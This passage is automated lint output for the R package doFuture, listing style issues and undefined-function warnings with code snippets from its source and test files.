chunk_summary)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/doFuture.R:205:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L205) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​      mdebug(msg)\n      ^~~~~~\n```\n[R/doFuture.R:206:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L206) *warning:* **no visible global function definition for ‘mprint’, Did you mean 'print'?**\n```r\n​      mprint(chunk_sizes)\n      ^~~~~~\n```\n[R/doFuture.R:207:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L207) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​      mdebug(\"Results before merge chunks:\")\n      ^~~~~~\n```\n[R/doFuture.R:208:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L208) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​      mstr(results)\n      ^~~~\n```\n[R/doFuture.R:209:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L209) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​      mdebug(\"Results after merge chunks:\")\n      ^~~~~~\n```\n[R/doFuture.R:210:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L210) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​      mstr(results2)\n      ^~~~\n```\n[R/doFuture.R:215:11:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L215) *warning:* **no visible global function definition for ‘FutureError’**\n```r\n​    ex <- FutureError(msg)\n          ^~~~~~~~~~~\n```\n[R/doFuture.R:220:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L220) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:223:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L223) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- accumulating results\")\n             ^~~~~~\n```\n[R/doFuture.R:233:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L233) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:241:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L241) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​    mdebug(\"- processing errors (handler = %s)\", sQuote(error_handling))\n    ^~~~~~\n```\n[R/doFuture.R:243:18:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L243) *warning:* **no visible global function definition for ‘getErrorValue’**\n```r\n​  error_value <- getErrorValue(it)\n                 ^~~~~~~~~~~~~\n```\n[R/doFuture.R:245:20:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L245) *warning:* **no visible global function definition for ‘getErrorIndex’**\n```r\n​    error_index <- getErrorIndex(it)\n                   ^~~~~~~~~~~~~\n```\n[R/doFuture.R:256:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L256) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"- extracting results\")\n             ^~~~~~\n```\n[R/doFuture.R:257:10:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L257) *warning:* **no visible global function definition for ‘getResult’**\n```r\n​  res <- getResult(it)\n         ^~~~~~~~~\n```\n[R/doFuture.R:258:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/doFuture.R:259:14:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/doFuture.R#L259) *warning:* **no visible global function definition for ‘mdebug’, Did you mean 'debug'?**\n```r\n​  if (debug) mdebug(\"doFuture() ... DONE\")\n             ^~~~~~\n```\n[R/globals.R:3:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L3) *style:* **Variable or function name should be snake_case.**\n```r\n​findGlobals_foreach <- function(expr, envir = parent.frame(), noexport = NULL) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:5:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L5) *style:* **Variable or function name should be snake_case.**\n```r\n​  makeDotsEnv <- function(...) {\n  ^~~~~~~~~~~\n```\n[R/globals.R:19:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L19) *warning:* **no visible global function definition for ‘getexports’**\n```r\n​  getexports(expr, e = exportenv, env = envir, bad = noexport)\n  ^~~~~~~~~~\n```\n[R/globals.R:26:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/globals.R:31:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L31) *style:* **Variable or function name should be snake_case.**\n```r\n​globalsAs <- function(globalsAs = \"*\") {\n^~~~~~~~~\n```\n[R/globals.R:31:23:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L31) *style:* **Variable or function name should be snake_case.**\n```r\n​globalsAs <- function(globalsAs = \"*\") {\n                      ^~~~~~~~~\n```\n[R/globals.R:32:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L32) *style:* **Lines should not be more than 80 characters.**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:32:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L32) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n  ^~~~~~~~~~~\n```\n[R/globals.R:38:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L38) *style:* **Lines should not be more than 80 characters.**\n```r\n​      .Defunct(msg = \"Option 'doFuture.globals.nullexport' is deprecated. Use 'doFuture.globalsAs = \\\"future-unless-manual\\\" or \\\"manual\\\" instead.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:41:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L41) *style:* **Variable or function name should be snake_case.**\n```r\n​    globalsAs <- getOption(\"doFuture.globalsAs\")\n    ^~~~~~~~~\n```\n[R/globals.R:42:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/globals.R:47:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L47) *style:* **Lines should not be more than 80 characters.**\n```r\n​        .Defunct(msg = sprintf(\"Option doFuture.foreach.export = %s is no longer supported. The closest is doFuture.globalsAs = 'future'.\", dQuote(t)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:49:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/globals.R:51:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L51) *style:* **Variable or function name should be snake_case.**\n```r\n​        globalsAs <- \"future\"\n        ^~~~~~~~~\n```\n[R/globals.R:53:9:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L53) *style:* **Variable or function name should be snake_case.**\n```r\n​        globalsAs <- \"future-with-warning\"\n        ^~~~~~~~~\n```\n[R/globals.R:55:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L55) *style:* **Lines should not be more than 80 characters.**\n```r\n​        .Defunct(msg = sprintf(\"Option 'doFuture.foreach.export' is defunct and replaced by option 'doFuture.globalsAs'. Also, value '%s' is unknown.\", dQuote(t)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:58:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L58) *style:* **Lines should not be more than 80 characters.**\n```r\n​      .Deprecated(msg = sprintf(\"Option doFuture.foreach.export = %s is deprecated and has been replaced by doFuture.globalsAs = %s\", dQuote(t), sQuote(globalsAs)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:64:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L64) *style:* **Variable or function name should be snake_case.**\n```r\n​    globalsAs <- Sys.getenv(\"R_DOFUTURE_GLOBALSAS\", \"future-unless-manual\")\n    ^~~~~~~~~\n```\n[R/globals.R:66:5:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L66) *style:* **Variable or function name should be snake_case.**\n```r\n​    globalsAs <- getOption(\"doFuture.globalsAs.fallback\", globalsAs)\n    ^~~~~~~~~\n```\n[R/globals.R:69:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L69) *style:* **Lines should not be more than 80 characters.**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:69:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L69) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.character(globalsAs), !anyNA(globalsAs), length(globalsAs) == 1)\n  ^~~~~~~~~~~\n```\n[R/globals.R:75:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L75) *style:* **Variable or function name should be snake_case.**\n```r\n​getGlobalsAndPackages_fix <- local({\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:94:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L94) *style:* **Lines should not be more than 80 characters.**\n```r\n​getGlobalsAndPackages_doFuture <- function(expr, envir, export = NULL, noexport = NULL, packages = NULL, globalsAs, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:94:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L94) *style:* **Variable or function name should be snake_case.**\n```r\n​getGlobalsAndPackages_doFuture <- function(expr, envir, export = NULL, noexport = NULL, packages = NULL, globalsAs, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:94:106:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L94) *style:* **Variable or function name should be snake_case.**\n```r\n​getGlobalsAndPackages_doFuture <- function(expr, envir, export = NULL, noexport = NULL, packages = NULL, globalsAs, debug = FALSE) {\n                                                                                                         ^~~~~~~~~\n```\n[R/globals.R:95:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L95) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.language(expr) || is.expression(expr))\n  ^~~~~~~~~~~\n```\n[R/globals.R:96:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L96) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.environment(envir))\n  ^~~~~~~~~~~\n```\n[R/globals.R:97:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L97) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(is.logical(debug))\n  ^~~~~~~~~~~\n```\n[R/globals.R:101:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L101) *style:* **Variable or function name should be snake_case.**\n```r\n​  globalsAs <- globalsAs(globalsAs)\n  ^~~~~~~~~\n```\n[R/globals.R:106:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L106) *style:* **Variable or function name should be snake_case.**\n```r\n​      globalsAs <- gsub(\"-unless-manual$\", \"\", globalsAs)\n      ^~~~~~~~~\n```\n[R/globals.R:108:7:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L108) *style:* **Variable or function name should be snake_case.**\n```r\n​      globalsAs <- \"manual\"\n      ^~~~~~~~~\n```\n[R/globals.R:113:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L113) *style:* **Variable or function name should be snake_case.**\n```r\n​  withWarning <- grepl(\"-with-warning$\", globalsAs)\n  ^~~~~~~~~~~\n```\n[R/globals.R:114:20:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L114) *style:* **Variable or function name should be snake_case.**\n```r\n​  if (withWarning) globalsAs <- gsub(\"-with-warning$\", \"\", globalsAs)\n                   ^~~~~~~~~\n```\n[R/globals.R:138:11:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L138) *warning:* **no visible global function definition for ‘getGlobalsAndPackages’**\n```r\n​    gp <- getGlobalsAndPackages(expr, envir = globals_envir, globals = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:150:11:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L150) *warning:* **no visible global function definition for ‘getGlobalsAndPackages’**\n```r\n​    gp <- getGlobalsAndPackages(expr, envir = globals_envir, globals = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:160:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L160) *warning:* **no visible global function definition for ‘mstr’, Did you mean 'str'?**\n```r\n​  mstr(globals)\n  ^~~~\n```\n[R/globals.R:161:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L161) *warning:* **no visible global function definition for ‘stop_if_not’, Did you mean 'stopifnot'?**\n```r\n​  stop_if_not(\"...future.x_ii\" %in% names(globals))\n  ^~~~~~~~~~~\n```\n[R/globals.R:162:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/globals.R:171:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L171) *style:* **Lines should not be more than 80 characters.**\n```r\n​      warning(sprintf(\"Detected a foreach(..., .export = c(%s)) call where '.export' might lack one or more variables (as identified by globalsAs = c(%s) of which some might be false positives): %s\", paste(dQuote(globals2), collapse = \", \"), paste(sQuote(globalsAs), collapse = \", \"), paste(dQuote(missing), collapse = \", \")))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:175:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/globals.R:180:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L180) *style:* **Lines should not be more than 80 characters.**\n```r\n​      mdebug(\"  - appending %d '.export' globals (not already found through automatic lookup): %s\",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/globals.R:194:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/globals.R#L194) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/options.R:1:40:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/options.R#L1) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' Options used by the doFuture adapter \n                                       ^\n```\n[R/registerDoFuture.R:8:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:19:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L19) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:22:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:51:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:61:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:68:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:72:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:75:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:76:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​#' \n  ^\n```\n[R/registerDoFuture.R:90:3:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L90) *warning:* **no visible global function definition for ‘setDoPar’**\n```r\n​  setDoPar(doFuture, data = list(globalsAs = globalsAs), info = info)\n  ^~~~~~~~\n```\n[R/registerDoFuture.R:90:12:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/registerDoFuture.R#L90) *warning:* **no visible binding for global variable ‘doFuture’**\n```r\n​  setDoPar(doFuture, data = list(globalsAs = globalsAs), info = info)\n           ^~~~~~~~\n```\n[R/utils.R:33:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/R/utils.R#L33) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[tests/cluster-missing-doFuture-pkg.R:12:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L12) *style:* **Variable or function name should be snake_case.**\n```r\n​setupClusterWithoutPkgs <- function(type = \"PSOCK\",\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/cluster-missing-doFuture-pkg.R:25:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L25) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:51:74:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L51) *style:* **Trailing whitespace is superfluous.**\n```r\n​  cl <- setupClusterWithoutPkgs(type, withouts = c(\"future\", \"doFuture\"))  \n                                                                         ^~\n```\n[tests/cluster-missing-doFuture-pkg.R:54:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[tests/cluster-missing-doFuture-pkg.R:68:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:69:38:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  cl <- setupClusterWithoutPkgs(type)  \n                                     ^~\n```\n[tests/cluster-missing-doFuture-pkg.R:72:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[tests/cluster-missing-doFuture-pkg.R:86:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:89:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/cluster-missing-doFuture-pkg.R:91:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/cluster-missing-doFuture-pkg.R#L91) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/foreach,globals.R:41:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/foreach,globals.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[tests/foreach,globals.R:48:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/foreach,globals.R#L48) *style:* **Lines should not be more than 80 characters.**\n```r\n​  stopifnot((strategy %in% c(c(\"cluster\", \"multisession\")) && inherits(y, \"simpleError\")) || identical(y, y_truth))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/foreach,globals.R:64:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/foreach,globals.R#L64) *style:* **Variable or function name should be snake_case.**\n```r\n​X <- matrix(1:4, nrow = 3L, ncol = 4L)\n^\n```\n[tests/foreach,globals.R:88:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/foreach,globals.R#L88) *style:* **Lines should not be more than 80 characters.**\n```r\n​message(\"*** doFuture - automatically finiding ambiguous global/local variables ...\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/foreach,globals.R:106:1:](https://github.com/HenrikBengtsson/doFuture/blob/3b854aca811c9fce3fd05b3d9e1c2cb771a2926b/tests/foreach,globals.R#L106) *style:* **Trailing whitespace is superfluous.**\n```r\n​  